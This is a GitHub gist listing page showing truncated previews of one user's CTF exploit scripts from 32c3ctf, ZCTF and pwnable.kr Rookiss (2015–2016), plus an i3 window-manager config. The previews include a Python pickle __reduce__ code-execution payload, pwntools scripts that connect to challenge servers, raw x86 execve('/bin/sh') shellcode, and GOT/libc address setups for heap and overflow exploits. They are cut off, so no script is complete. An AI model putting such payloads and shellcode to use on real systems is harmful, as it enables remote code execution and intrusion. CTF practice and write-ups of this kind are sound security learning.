Skip to content

Instantly share code, notes, and snippets.

View cubarco's full-sized avatar

Cubarco cubarco

69 followers · 40 following
View GitHub Profile
@cubarco
cubarco / 32c3ctf-gurke.py
Created December 30, 2015 04:10
#!/usr/bin/env python
# coding=utf8
import urllib2
import pickle
class Payload(object):
def __reduce__(self):
comm = "sys.stderr.write(__import__('__main__').flag.flag)"
@cubarco
cubarco / 32c3ctf-teufel-exp.py
Last active December 30, 2015 04:30
#!/usr/bin/env python
# coding=utf8
from pwn import p64, remote
from time import sleep
from struct import unpack
main_without_push_addr = 0x4004ee
p = remote('136.243.194.41', 666)
@cubarco
cubarco / pwnable-rookiss-note.py
Last active January 23, 2016 16:07
This may cost more than one minute, and may fail at the end. Keep trying, you'll get the shell XD
#!/usr/bin/env python
# coding=utf8
from pwn import p32, process, remote
# p = process('./note')
p = remote('0', 9019)
shellcode = '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x90'
print '[*] Receiving welcome message...'
@cubarco
cubarco / zctf-guess.py
Created January 24, 2016 12:30
#!/usr/bin/env python
# coding=utf8
from pwn import p64, remote
p = remote('115.28.27.103', 22222)
flag_addr = 0x6010c0
p.sendline('ZCTF{' + '\x01'*29 + '\x00'*262 + p64(flag_addr+5))
@cubarco
cubarco / zctf-note1.py
Created January 24, 2016 12:32
#!/usr/bin/env python
# coding=utf8
from pwn import p64, ELF, process, remote
from struct import unpack
from time import sleep
# p = process('./note1')
p = remote('115.28.27.103', 9001)
elf = ELF('./libc-2.19.so')
@cubarco
cubarco / zctf-note3.py
Created January 28, 2016 03:24
#!/usr/bin/env python
# coding=utf8
from pwn import p64, u64, process, ELF
elf = ELF('/lib64/libc.so.6')
# elf = ELF('./libc-2.19.so')
p = process('./note3')
free_got = 0x602018
@cubarco
cubarco / zctf-note2.py
Last active January 28, 2016 08:51
#!/usr/bin/env python
# coding=utf8
from pwn import process, ELF, p64
from struct import unpack
# elf = ELF('./libc-2.19.so')
elf = ELF('/lib64/libc.so.6')
p = process('./note2')
@cubarco
cubarco / config
Created March 5, 2016 09:01
My i3 configs.
#.......
# font
#.......
#font -*-cure-medium-*-*-*-11-*-*-*-*-*-*-*
font pango:snap, Tamsyn, WenQuanYi Bitmap Song, FontAwesome, Unifont 8
#..........
# windows
#..........
@cubarco
cubarco / pwnable-rookiss-echo2.py
Created March 6, 2016 12:31
#!/usr/bin/env python
# coding=utf8
from pwn import u64, process, remote, shellcraft, context, asm
context.arch = 'amd64'
bss_o = 0x602098
p = process('./echo2')
@cubarco
cubarco / pwnable-rookiss-md5-exp.py
Created March 15, 2016 14:41
#!/usr/bin/env python
# coding=utf8
from pwn import process, p32, remote
from base64 import b64encode
from time import time
from subprocess import check_output
system = 0x8049187
buf = 0x804B0E0